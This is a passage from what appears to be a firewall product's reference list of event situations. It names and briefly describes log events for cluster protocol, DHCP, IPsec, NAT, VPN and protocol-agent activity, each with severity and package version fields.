First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Cluster protocol debug.
Back to top

FW_Cluster-Protocol-Cluster-Protocol-Error

About this situation: Cluster protocol error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Cluster protocol error.
Back to top

FW_Cluster-Protocol-Control-Queue-Is-Full

About this situation: Control queue is full
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Control queue is full.
Back to top

FW_Cluster-Protocol-Device-Not-IP-Capable

About this situation: Device not IP capable
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Device not IP capable.
Back to top

FW_Cluster-Protocol-Invalid-License

About this situation: Invalid license
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Invalid license.
Back to top

FW_Cluster-Protocol-No-Multicast-IP-Configured

About this situation: No multicast IP configured
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: No multicast IP configured.
Back to top

FW_Cluster-Protocol-No-Multicast-IP-Found

About this situation: No multicast IP found
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: No multicast IP found.
Back to top

FW_Cluster-Protocol-The-Interface-Has-No-IP-Address

About this situation: The interface has no IP address
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: The interface has no IP address.
Back to top

FW_Communication-CA-Certificate-Error

About this situation: CA certificate error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: CA certificate error.
Back to top

FW_Communication-Client-Certificate-Error

About this situation: Client certificate error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Client certificate error.
Back to top

FW_Communication-Client-Private-Key-Error

About this situation: Client private key error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Client private key error.
Back to top

FW_Communication-Communication-Error

About this situation: Communication error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Communication error.
Back to top

FW_Communication-Server-Certificate-Error

About this situation: Server certificate error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Server certificate error.
Back to top

FW_Communication-Server-Private-Key-Error

About this situation: Server private key error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Server private key error.
Back to top

FW_Connection-Closed

About this situation: Connection closed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Connection closed.
Back to top

FW_Connection-Discarded

About this situation: Connection discarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Connection discarded.
Back to top

FW_Connection-Queued

About this situation: Connection queued
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Connection queued.
Back to top

FW_Connection-Tracking-Error-When-Serializing-For-State-Sync

About this situation: Error when serializing for state sync
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Error when serializing for state sync.
Back to top

FW_Connection-Tracking-Error-When-Unserializing-Sync-Data

About this situation: Error when unserializing sync data
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Error when unserializing sync data.
Back to top

FW_DHCP-DCHP-Relay-MVPN-Interface-Down

About this situation: DCHP Relay mVPN interface down
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DCHP Relay mVPN interface down.
Back to top

FW_DHCP-DHCP-ARP-Check

About this situation: DHCP ARP check
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP ARP check.
Back to top

FW_DHCP-DHCP-Bound

About this situation: DHCP bound
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP bound.
Back to top

FW_DHCP-DHCP-Event-Handling-Error

About this situation: DHCP event handling error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP event handling error.
Back to top

FW_DHCP-DHCP-Expire

About this situation: DHCP expire
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP expire.
Back to top

FW_DHCP-DHCP-Fail

About this situation: DHCP fail
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP fail.
Back to top

FW_DHCP-DHCP-Medium

About this situation: DHCP medium
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP medium.
Back to top

FW_DHCP-DHCP-Message-From-Untrusted-Circuit-Discarded

About this situation: DHCP message from untrusted circuit discarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP message from untrusted circuit discarded.
Back to top

FW_DHCP-DHCP-Message-Received

About this situation: DHCP message received
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP message received.
Back to top

FW_DHCP-DHCP-Preinit

About this situation: DHCP preinit
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP preinit.
Back to top

FW_DHCP-DHCP-Rebind

About this situation: DHCP rebind
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP rebind.
Back to top

FW_DHCP-DHCP-Reboot

About this situation: DHCP reboot
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP reboot.
Back to top

FW_DHCP-DHCP-Relay-Address-Not-Configured-Reply-Discarded

About this situation: DHCP Relay address not configured, reply discarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP Relay address not configured, reply discarded.
Back to top

FW_DHCP-DHCP-Relay-Address-Spoofed-Request-Discarded

About this situation: DHCP Relay address spoofed, request discarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP Relay address spoofed, request discarded.
Back to top

FW_DHCP-DHCP-Release

About this situation: DHCP release
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP release.
Back to top

FW_DHCP-DHCP-Renew

About this situation: DHCP renew
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP renew.
Back to top

FW_DHCP-DHCP-Reply-Received

About this situation: DHCP reply received
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP reply received.
Back to top

FW_DHCP-DHCP-Reply-Sent

About this situation: DHCP reply sent
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP reply sent.
Back to top

FW_DHCP-DHCP-Request-Forwarded

About this situation: DHCP request forwarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP request forwarded.
Back to top

FW_DHCP-DHCP-Request-Received

About this situation: DHCP request received
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP request received.
Back to top

FW_DHCP-DHCP-Request-Sent

About this situation: DHCP request sent
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP request sent.
Back to top

FW_DHCP-DHCP-Timeout

About this situation: DHCP timeout
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DHCP timeout.
Back to top

FW_DHCP-DHCP-V6-Relay-Reply-Received

About this situation: DHCP V6 Relay reply received
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: DHCP request received.
Back to top

FW_DHCP-DHCP-V6-Relay-Req-Received

About this situation: DHCP V6 Relay request received
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: DHCP request received.
Back to top

FW_DHCP-Failed-To-Add-Relay-Agent-Option-Request-Discarded

About this situation: Failed to add Relay Agent option, request discarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Failed to add Relay Agent option, request discarded.
Back to top

FW_DHCP-Hardware-Type-Mismatch-Request-Discarded

About this situation: Hardware type mismatch, request discarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Hardware type mismatch, request discarded.
Back to top

FW_DHCP-Illegal-DHCP-Message-Discarded

About this situation: Illegal DHCP message discarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Illegal DHCP message discarded.
Back to top

FW_DHCP-Illegal-DHCP-Reply-Discarded

About this situation: Illegal DHCP reply discarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Illegal DHCP reply discarded.
Back to top

FW_DHCP-Illegal-DHCP-Request-Discarded

About this situation: Illegal DHCP request discarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Illegal DHCP request discarded.
Back to top

FW_DHCP-Missing-Relay-Agent-Options-Reply-Discarded

About this situation: Missing Relay Agent options, reply discarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Missing Relay Agent options, reply discarded.
Back to top

FW_DHCP-Oversized-DHCP-Message-Discarded

About this situation: Oversized DHCP message discarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Oversized DHCP message discarded.
Back to top

FW_DHCP-Sending-DHCP-Reply-Failed

About this situation: Sending DHCP reply failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Sending DHCP reply failed.
Back to top

FW_DHCP-Sending-DHCP-Request-Failed

About this situation: Sending DHCP request failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Sending DHCP request failed.
Back to top

FW_DHCP-Unexpected-Relay-Agent-Options-Reply-Discarded

About this situation: Unexpected Relay Agent options, reply discarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Unexpected Relay Agent options, reply discarded.
Back to top

FW_DHCP-Unknown-DCHP-Relay-Error

About this situation: Unknown DCHP Relay error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Unknown DCHP Relay error.
Back to top

FW_DHCP-Unsupported-DHCP-Event

About this situation: Unsupported DHCP event
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Unsupported DHCP event.
Back to top

FW_DHCP_server_lease_activated

About this situation: DHCP Server lease activated
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-553-5211
Description: DHCP server: lease activated.
Back to top

FW_DHCP_server_lease_expired

About this situation: DHCP Server lease expired
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-553-5211
Description: DHCP server: lease expired.
Back to top

FW_Dropped-AH-Packet

About this situation: Dropped AH packet
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Dropped AH packet.
Back to top

FW_Dropped-ESP-Packet

About this situation: Dropped ESP packet
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Dropped ESP packet.
Back to top

FW_Hybrid-Authentication-Done

About this situation: Hybrid authentication done
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Hybrid authentication done.
Back to top

FW_Hybrid-Authentication-Failed

About this situation: Hybrid authentication failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Hybrid authentication failed.
Back to top

FW_IGMPP-Group-dropped

About this situation: Multicast group has been dropped, and is no longer handled.
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-319-4219
Description: Multicast group is no longer handled by the IGMP proxy.
Back to top

FW_IGMPP-Max-memberships-limit-reached

About this situation: IGMP Proxy has handled maximum number of groups, group report ignored.
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-319-4219
Description: IGMP Proxy has handled maximum number of groups, group report ignored.
Back to top

FW_IGMPP-New-group-added

About this situation: New multicast group has been added, and is handled.
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-319-4219
Description: New multicast group is being handled by the IGMP proxy.
Back to top

FW_IGMPP-Route-has-been-installed

About this situation: IGMP Proxy has installed a route in kernel multicast forwarding cache.
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-319-4219
Description: IGMP Proxy has installed a route in kernel multicast forwarding cache.
Back to top

FW_IGMPP-Route-has-been-removed

About this situation: IGMP Proxy has removed a route from the kernel multicast forwarding cache.
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-319-4219
Description: IGMP Proxy has removed a route from the kernel multicast forwarding cache.
Back to top

FW_IKE-Phase-1-Info

About this situation: IKE Phase-1 info
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IKE SA info.
Back to top

FW_IKE-Phase-2-Info

About this situation: IKE Phase-2 info
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec SA info.
Back to top

FW_Incomplete-Connection-Closed

About this situation: Incomplete connection closed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Incomplete connection closed.
Back to top

FW_Info-Request

About this situation: Engine initiated information lookup related connection.
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Description: Engine initiated information lookup related connection triggered when engine cannot handle the connection without querying more information on the original connections endpoints or data passed between endpoints.
Back to top

FW_Internal-Error

About this situation: Internal error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Internal error.
Back to top

FW_IPsec

About this situation: IPsec
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec.
Back to top

FW_IPsec-Authentication-Error

About this situation: IPsec authentication error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec authentication error.
Back to top

FW_IPsec-Configuration-Error

About this situation: IPsec configuration error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec configuration error.
Back to top

FW_IPsec-Critical-Error

About this situation: IPsec critical error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec critical error.
Back to top

FW_IPsec-Error

About this situation: IPsec error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec error.
Back to top

FW_IPsec-IKE-Error

About this situation: IPsec IKE error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec IKE error.
Back to top

FW_IPsec-IKE-Notification

About this situation: IPsec IKE notification
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec IKE notification.
Back to top

FW_IPsec-Info

About this situation: IPsec info
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec info.
Back to top

FW_IPsec-Notification

About this situation: IPsec notification
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec notification.
Back to top

FW_IPsec-Warning

About this situation: IPsec warning
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: IPsec warning.
Back to top

FW_License-Exceeded

About this situation: License exceeded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: License exceeded.
Back to top

FW_Log-System-Log-Spool-Corrupted

About this situation: Log spool corrupted
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Log spool corrupted.
Back to top

FW_Log-System-Log-Spool-Is-Becoming-Full

About this situation: Log spool is becoming full
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Log spool is becoming full.
Back to top

FW_NAT-No-Suitable-NAT-Rule-Found

About this situation: No suitable NAT rule found
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: No suitable NAT rule found.
Back to top

FW_NAT-Requested-NAT-Cannot-Be-Done

About this situation: Requested NAT cannot be done
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Requested NAT cannot be done.
Back to top

FW_Netlink-Initializing-Raw-Socket

About this situation: Initializing raw socket
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Initializing raw socket.
Back to top

FW_Netlink-Initializing-Raw-Socket-Failed

About this situation: Initializing raw socket failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Initializing raw socket failed.
Back to top

FW_Netlink-Netlink-Start

About this situation: Netlink start
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Netlink start.
Back to top

FW_Netlink-Receive-ICMP-Echo

About this situation: Receive ICMP echo
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Receive ICMP echo.
Back to top

FW_Netlink-Send-ICMP-Echo

About this situation: Send ICMP echo
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Send ICMP echo.
Back to top

FW_Netlink-Send-Update-To-DNS-Server

About this situation: Send update to DNS server
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Send update to DNS server.
Back to top

FW_Netlink-Updating-DNS-Failed

About this situation: Updating DNS failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Updating DNS failed.
Back to top

FW_New-Connection

About this situation: New connection
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: New connection.
Back to top

FW_New-IPsec-VPN-Connection

About this situation: New connection through IPsec VPN
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: New connection through IPsec VPN.
Back to top

FW_New-Route-Based-VPN-Connection

About this situation: New route based VPN connection
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: New route based VPN connection.
Back to top

FW_New-SSL-VPN-Connection

About this situation: New connection through SSL VPN
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: New connection through SSL VPN.
Back to top

FW_New-VPN-Connection

About this situation: New VPN connection
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: New VPN connection.
Back to top

FW_New-Web-Portal-SSL-VPN-Connection

About this situation: SSL VPN Web Portal user authentication accepted
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN Web Portal user authentication accepted
Back to top

FW_No-Suitable-NAT-Rule-Found-For-Related-Connection

About this situation: No suitable NAT rule found for related connection
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: No suitable NAT rule found for related connection.
Back to top

FW_Notice

About this situation: Notice
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Notice.
Back to top

FW_Packet-Discarded

About this situation: Packet discarded
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Packet discarded.
Back to top

FW_Probe

About this situation: Engine initiated probe connection.
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1602-5242
Last changed: sgpkg-ips-1602-5242
Description: Engine initiated probe connection to the server endpoint of another connection initiated by a network client. The purpose of the probe connection is to measure application health monitoring data.
Back to top

FW_Protocol-Agent-ADDRESS-Block-Not-Found-From-TNS-Message

About this situation: ADDRESS block not found from TNS message
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: ADDRESS block not found from TNS message.
Back to top

FW_Protocol-Agent-Application-Protocol-Data-Modification-Failed

About this situation: Application protocol data modification failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Application protocol data modification failed.
Back to top

FW_Protocol-Agent-Application-Protocol-Version-Is-Not-Supported

About this situation: Application protocol version is not supported
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Application protocol version is not supported.
Back to top

FW_Protocol-Agent-Application-Protocol-Version-Not-Recognised

About this situation: Application protocol version not recognised
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Application protocol version not recognised.
Back to top

FW_Protocol-Agent-Application-Protocol-Violation

About this situation: Application protocol violation
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Application protocol violation.
Back to top

FW_Protocol-Agent-Cannot-Access-Connection-State

About this situation: Cannot access connection state
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Cannot access connection state.
Back to top

FW_Protocol-Agent-Client-Application-Error

About this situation: Client application error
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Client application error.
Back to top

FW_Protocol-Agent-Configuration-Information-For-This-Connection

About this situation: Configuration information for this connection
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Configuration information for this connection.
Back to top

FW_Protocol-Agent-Connection-Cannot-Be-Redirected-To-Proxy-Server-Due-To-Absence-Of-Source-NAT-Rule

About this situation: Connection cannot be redirected to Proxy Server due to absence of source NAT rule
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Connection cannot be redirected to Proxy Server due to absence of source NAT rule.
Back to top

FW_Protocol-Agent-Connection-Redirected-To-Proxy-Server

About this situation: Connection redirected to Proxy Server
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Connection redirected to Proxy Server.
Back to top

FW_Protocol-Agent-Data-Connection-Cannot-Be-Redirected-To-Proxy-Server-Due-To-Absence-Of-Source-NAT-Rule

About this situation: Data connection cannot be redirected to Proxy Server due to absence of source NAT rule
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Data connection cannot be redirected to Proxy Server due to absence of source NAT rule.
Back to top

FW_Protocol-Agent-Data-Connection-Redirected-To-Proxy-Server

About this situation: Data connection redirected to Proxy Server
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Data connection redirected to Proxy Server.
Back to top

FW_Protocol-Agent-DESCRIPTION-Block-Not-Found-From-TNS-Message

About this situation: DESCRIPTION block not found from TNS message
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: DESCRIPTION block not found from TNS message.
Back to top

FW_Protocol-Agent-Different-Version-Of-Synchronized-Connection-State

About this situation: Different version of synchronized connection state
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Different version of synchronized connection state.
Back to top

FW_Protocol-Agent-Error-While-Preparing-State-Synchronization

About this situation: Error while preparing state synchronization
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Error while preparing state synchronization.
Back to top

FW_Protocol-Agent-Error-While-Processing-Synchronized-State

About this situation: Error while processing synchronized state
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Error while processing synchronized state.
Back to top

FW_Protocol-Agent-Error-With-Proxy-Server

About this situation: Error with Proxy Server
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Error with Proxy Server.
Back to top

FW_Protocol-Agent-ERROR_STACK-Block-Not-Found-From-TNS-Error-Message

About this situation: ERROR_STACK block not found from TNS error message
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: ERROR_STACK block not found from TNS error message.
Back to top

FW_Protocol-Agent-Failed-To-Allow-A-Related-Connection-To-Open

About this situation: Failed to allow a related connection to open
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Failed to allow a related connection to open.
Back to top

FW_Protocol-Agent-HOST-Block-Not-Found-From-TNS-Message

About this situation: HOST block not found from TNS message
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
